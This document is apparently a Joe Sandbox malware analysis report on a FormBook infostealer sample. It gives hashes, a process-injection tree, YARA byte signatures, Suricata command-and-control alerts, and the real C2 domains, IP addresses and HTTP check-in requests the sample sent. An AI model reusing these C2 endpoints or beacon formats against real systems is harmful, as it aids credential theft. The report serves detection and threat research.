Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
lByv6mqTCJ.exe

Overview

General Information

Sample name:lByv6mqTCJ.exe
renamed because original name is a hash value
Original sample name:cc3dc16efe58123d394b8e068b5a8410a971d156ff4de13795a31e257cd83e15.exe
Analysis ID:1530780
MD5:031c70730800588a7b8228f4ab79595e
SHA1:34f6426df964d75f6c148b0bfc572c33bd2cd798
SHA256:cc3dc16efe58123d394b8e068b5a8410a971d156ff4de13795a31e257cd83e15
Tags:exeuser-adrian__luca
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file does not import any functions
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • lByv6mqTCJ.exe (PID: 2128 cmdline: "C:\Users\user\Desktop\lByv6mqTCJ.exe" MD5: 031C70730800588A7B8228F4AB79595E)
    • ooaSzUjoYqoTW.exe (PID: 3812 cmdline: "C:\Program Files (x86)\qCxIpusqZONCCjzbpJDffXbRFAcIKoXbBEQoEJrcdiBpRvwrym\ooaSzUjoYqoTW.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • grpconv.exe (PID: 5412 cmdline: "C:\Windows\SysWOW64\grpconv.exe" MD5: 5A13926732E6D349FD060C072BC7FB74)
        • ooaSzUjoYqoTW.exe (PID: 760 cmdline: "C:\Program Files (x86)\qCxIpusqZONCCjzbpJDffXbRFAcIKoXbBEQoEJrcdiBpRvwrym\ooaSzUjoYqoTW.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • firefox.exe (PID: 7056 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.3876568128.0000000004330000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000003.00000002.3876568128.0000000004330000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2bc80:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x13def:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000000.00000002.2131471529.0000000000411000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000000.00000002.2131471529.0000000000411000.00000040.00000001.01000000.00000003.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2dcc3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x15e32:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000003.00000002.3876436404.0000000002A10000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 9 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        0.2.lByv6mqTCJ.exe.410000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          0.2.lByv6mqTCJ.exe.410000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2dec3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x16032:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

          Sigma Signatures

          No Sigma rule has matched

          Suricata Signatures

          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-10-10T14:38:14.159611+020020507451Malware Command and Control Activity Detected192.168.2.55000485.159.66.9380TCP
          2024-10-10T14:38:45.296817+020020507451Malware Command and Control Activity Detected192.168.2.549770206.119.82.14780TCP
          2024-10-10T14:39:08.912810+020020507451Malware Command and Control Activity Detected192.168.2.549914162.0.238.24680TCP
          2024-10-10T14:39:23.029135+020020507451Malware Command and Control Activity Detected192.168.2.549983183.181.83.13180TCP
          2024-10-10T14:39:36.222740+020020507451Malware Command and Control Activity Detected192.168.2.54998813.248.169.4880TCP
          2024-10-10T14:40:11.420465+020020507451Malware Command and Control Activity Detected192.168.2.549992195.161.68.880TCP
          2024-10-10T14:40:33.346653+020020507451Malware Command and Control Activity Detected192.168.2.54999645.194.36.1280TCP
          2024-10-10T14:40:46.748670+020020507451Malware Command and Control Activity Detected192.168.2.5500003.33.130.19080TCP

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Antivirus / Scanner detection for submitted sample
          Source: lByv6mqTCJ.exeAvira: detected
          Multi AV Scanner detection for submitted file
          Source: lByv6mqTCJ.exeReversingLabs: Detection: 76%
          Yara detected FormBook
          Source: Yara matchFile source: 0.2.lByv6mqTCJ.exe.410000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000002.3876568128.0000000004330000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.2131471529.0000000000411000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.3876436404.0000000002A10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.2132420078.0000000001750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.3875595230.0000000000620000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.3876687207.0000000005530000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.2134057488.0000000004430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          AI detected suspicious sample
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
          Machine Learning detection for sample
          Source: lByv6mqTCJ.exeJoe Sandbox ML: detected
          Source: lByv6mqTCJ.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: lByv6mqTCJ.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
          Source: Binary string: grpconv.pdb source: lByv6mqTCJ.exe, 00000000.00000003.2097880175.000000000139D000.00000004.00000020.00020000.00000000.sdmp, lByv6mqTCJ.exe, 00000000.00000003.2131424199.00000000013A6000.00000004.00000020.00020000.00000000.sdmp, ooaSzUjoYqoTW.exe, 00000002.00000002.3876120909.000000000116E000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: grpconv.pdbGCTL source: lByv6mqTCJ.exe, 00000000.00000003.2097880175.000000000139D000.00000004.00000020.00020000.00000000.sdmp, lByv6mqTCJ.exe, 00000000.00000003.2131424199.00000000013A6000.00000004.00000020.00020000.00000000.sdmp, ooaSzUjoYqoTW.exe, 00000002.00000002.3876120909.000000000116E000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: ooaSzUjoYqoTW.exe, 00000002.00000002.3875597421.00000000004CE000.00000002.00000001.01000000.00000004.sdmp, ooaSzUjoYqoTW.exe, 00000005.00000000.2199021776.00000000004CE000.00000002.00000001.01000000.00000004.sdmp
          Source: Binary string: wntdll.pdbUGP source: lByv6mqTCJ.exe, 00000000.00000002.2132478501.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, lByv6mqTCJ.exe, 00000000.00000003.2026593857.000000000148C000.00000004.00000020.00020000.00000000.sdmp, lByv6mqTCJ.exe, 00000000.00000003.2028568483.0000000001631000.00000004.00000020.00020000.00000000.sdmp, lByv6mqTCJ.exe, 00000000.00000002.2132478501.000000000197E000.00000040.00001000.00020000.00000000.sdmp, grpconv.exe, 00000003.00000003.2135035508.00000000043E4000.00000004.00000020.00020000.00000000.sdmp, grpconv.exe, 00000003.00000002.3876792528.0000000004590000.00000040.00001000.00020000.00000000.sdmp, grpconv.exe, 00000003.00000002.3876792528.000000000472E000.00000040.00001000.00020000.00000000.sdmp, grpconv.exe, 00000003.00000003.2131632668.0000000004233000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: lByv6mqTCJ.exe, lByv6mqTCJ.exe, 00000000.00000002.2132478501.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, lByv6mqTCJ.exe, 00000000.00000003.2026593857.000000000148C000.00000004.00000020.00020000.00000000.sdmp, lByv6mqTCJ.exe, 00000000.00000003.2028568483.0000000001631000.00000004.00000020.00020000.00000000.sdmp, lByv6mqTCJ.exe, 00000000.00000002.2132478501.000000000197E000.00000040.00001000.00020000.00000000.sdmp, grpconv.exe, grpconv.exe, 00000003.00000003.2135035508.00000000043E4000.00000004.00000020.00020000.00000000.sdmp, grpconv.exe, 00000003.00000002.3876792528.0000000004590000.00000040.00001000.00020000.00000000.sdmp, grpconv.exe, 00000003.00000002.3876792528.000000000472E000.00000040.00001000.00020000.00000000.sdmp, grpconv.exe, 00000003.00000003.2131632668.0000000004233000.00000004.00000020.00020000.00000000.sdmp
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_0063C1E0 FindFirstFileW,FindNextFileW,FindClose,3_2_0063C1E0
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 4x nop then xor eax, eax3_2_006299E0
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 4x nop then pop edi3_2_0062DDAD
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 4x nop then mov ebx, 00000004h3_2_044204DE

          Networking

          barindex
          Suricata IDS alerts for network traffic
          Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49770 -> 206.119.82.147:80
          Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49914 -> 162.0.238.246:80
          Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49996 -> 45.194.36.12:80
          Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49992 -> 195.161.68.8:80
          Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49988 -> 13.248.169.48:80
          Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49983 -> 183.181.83.131:80
          Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50000 -> 3.33.130.190:80
          Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50004 -> 85.159.66.93:80
          Performs DNS queries to domains with low reputation
          Source: DNS query: www.nakama2-sshl.xyz
          Source: DNS query: www.085bet.xyz
          Source: DNS query: www.mudanya-nakliyat.xyz
          Source: Joe Sandbox ViewIP Address: 162.0.238.246 162.0.238.246
          Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
          Source: Joe Sandbox ViewASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
          Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
          Source: Joe Sandbox ViewASN Name: Africa-on-Cloud-ASZA Africa-on-Cloud-ASZA
          Source: Joe Sandbox ViewASN Name: COGENT-174US COGENT-174US
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficHTTP traffic detected: GET /vy4k/?PJ9L=d32l86geEWYHZjxTvbwjbSU9LAKscW6mTUIXWgcYKnqJcO8pcs3M8TeLmvZmGSd++zsCnZUgxj5ZgSRZm5GNnST7Zdxi7nq5Mi/W1p3900gY77wjz5lHrGRPWDQkbfDtqg==&2z=PtRhXbM HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.wdeb18.topConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; rv:40.0) Gecko/20100101 Firefox/40.1
          Source: global trafficHTTP traffic detected: GET /umni/?2z=PtRhXbM&PJ9L=JmqTC62v8P7mi6uPhLDAp9iaIjXSB8PwqG0a5mqRptE5j7gES97YNZljt2Ht2eKQTLeZ3UNIpnjTdZAH1rWC29igZO3jlkfdeSpr3eIJWfELnBNobLhFHVBS/RUmS3PasQ== HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.jophy.lifeConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; rv:40.0) Gecko/20100101 Firefox/40.1
          Source: global trafficHTTP traffic detected: GET /bgpi/?PJ9L=YTBtpahDWzdXKpondkv4unjklxOnnU8zYfk5eJgvm8+FRFKzirlrJKz42G/aqidm6CRQYg/EPrqYrXSvoqI47MOsphbaLGnzH8fia9Q2y/K0qDU8XdfqR00415ssDP2dWw==&2z=PtRhXbM HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.nakama2-sshl.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; rv:40.0) Gecko/20100101 Firefox/40.1
          Source: global trafficHTTP traffic detected: GET /mwd0/?PJ9L=zsNMsRGwEFvVUID2nvwzyJklFTuhYiH3MBMxsvplKOF6Mot/KgyF89prR2KXiWv2/O5FSCYG4KxKtJQmoSRR8B5YKwFVkQBt4uWwdNPaISGNJHiwitW0fGlJLbvQSjZk/A==&2z=PtRhXbM HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.comedy.financeConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; rv:40.0) Gecko/20100101 Firefox/40.1
          Source: global trafficHTTP traffic detected: GET /ucuo/?PJ9L=F2idnr0OHvaqOr51MpBBHVyFl1qtLQKAl/KaTPRWCGeZjFeJnhqhzch+KjyhoQK5CvQXQgMRpx/N5s0yRowiXacxk2STcCVUR6hfHsh5g/iR2diS6k4PTHt/uTzg7spZGA==&2z=PtRhXbM HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.trapkitten.websiteConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; rv:40.0) Gecko/20100101 Firefox/40.1
          Source: global trafficHTTP traffic detected: GET /nn3h/?PJ9L=0X/3r3PU8xeQ+UpzBpepRVcIT4+X7S/8fyuzw9u5zzT5DQpczFdmzE38B+SQag3b+0hUKu1k9LV6hnarOtmdXHDrfjsm00b18tkifTWDLiTHQlouOXMCIVM1BtqJliAH1Q==&2z=PtRhXbM HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.085bet.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; rv:40.0) Gecko/20100101 Firefox/40.1
          Source: global trafficHTTP traffic detected: GET /cei6/?2z=PtRhXbM&PJ9L=wjh3rahD5O8YyXDPiPgI2jcIa9PhSWViTP6mKxO94t21NngHPpPWFw/W8Bs1fVklZglLQeYSd7bpiR31wlDzTqFVQD+LW583mR1Tetwe2kyAmXAyEFXhKtTdwvrG/oT0lA== HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.rjscorp.orgConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; rv:40.0) Gecko/20100101 Firefox/40.1
          Source: global trafficHTTP traffic detected: GET /tkqd/?PJ9L=gK3QMDONvn1ERFi3le5iq9CigfqrIypj3GmKmlk3fya6bSQAZ6Mmquf2H7jJBtRUywZhV3/ctEceSqN2mfA4IjI7ZNYjXHB3esnYbISz5Gf8jiahD8UpXyLU85TiP8RgbQ==&2z=PtRhXbM HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.mudanya-nakliyat.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; rv:40.0) Gecko/20100101 Firefox/40.1
          Source: global trafficDNS traffic detected: DNS query: www.kabaribukota.press
          Source: global trafficDNS traffic detected: DNS query: www.wdeb18.top
          Source: global trafficDNS traffic detected: DNS query: www.jophy.life
          Source: global trafficDNS traffic detected: DNS query: www.nakama2-sshl.xyz
          Source: global trafficDNS traffic detected: DNS query: www.comedy.finance
          Source: global trafficDNS traffic detected: DNS query: www.trapkitten.website
          Source: global trafficDNS traffic detected: DNS query: www.48vlu.shop
          Source: global trafficDNS traffic detected: DNS query: www.085bet.xyz
          Source: global trafficDNS traffic detected: DNS query: www.rjscorp.org
          Source: global trafficDNS traffic detected: DNS query: www.pussy.coupons
          Source: global trafficDNS traffic detected: DNS query: www.mudanya-nakliyat.xyz
          Source: unknownHTTP traffic detected: POST /umni/ HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brHost: www.jophy.lifeContent-Length: 205Connection: closeCache-Control: no-cacheContent-Type: application/x-www-form-urlencodedOrigin: http://www.jophy.lifeReferer: http://www.jophy.life/umni/User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:40.0) Gecko/20100101 Firefox/40.1Data Raw: 50 4a 39 4c 3d 45 6b 43 7a 42 50 4b 67 6a 2b 62 46 74 38 75 4d 6c 66 48 35 77 4b 7a 38 58 6a 72 66 42 4a 79 43 2b 78 45 6c 39 54 72 6f 38 66 4d 51 36 72 4e 2f 44 62 61 62 63 4b 55 72 71 79 76 59 30 39 6a 31 44 37 6d 33 31 58 67 79 72 48 4c 71 4e 4a 34 6a 6c 61 36 71 38 70 79 46 4a 50 54 38 73 54 33 6d 51 45 31 62 33 75 6f 42 52 66 55 4d 37 78 63 68 5a 38 74 4d 45 6b 38 76 6a 32 4e 64 62 32 61 74 75 44 4d 71 76 66 44 6f 55 43 72 6b 4d 4a 70 46 61 64 73 6d 62 6b 4f 6e 33 4a 33 2f 6a 2f 31 76 43 4d 54 37 77 74 55 58 58 31 54 37 62 6c 6a 45 77 4f 7a 74 2b 30 4d 6a 32 6d 49 67 46 77 6b 77 70 37 4b 48 74 78 51 3d Data Ascii: PJ9L=EkCzBPKgj+bFt8uMlfH5wKz8XjrfBJyC+xEl9Tro8fMQ6rN/DbabcKUrqyvY09j1D7m31XgyrHLqNJ4jla6q8pyFJPT8sT3mQE1b3uoBRfUM7xchZ8tMEk8vj2Ndb2atuDMqvfDoUCrkMJpFadsmbkOn3J3/j/1vCMT7wtUXX1T7bljEwOzt+0Mj2mIgFwkwp7KHtxQ=
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 10 Oct 2024 12:38:45 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66aa3fcf-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Oct 2024 12:39:01 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 389X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Oct 2024 12:39:03 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 389X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Oct 2024 12:39:06 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 389X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
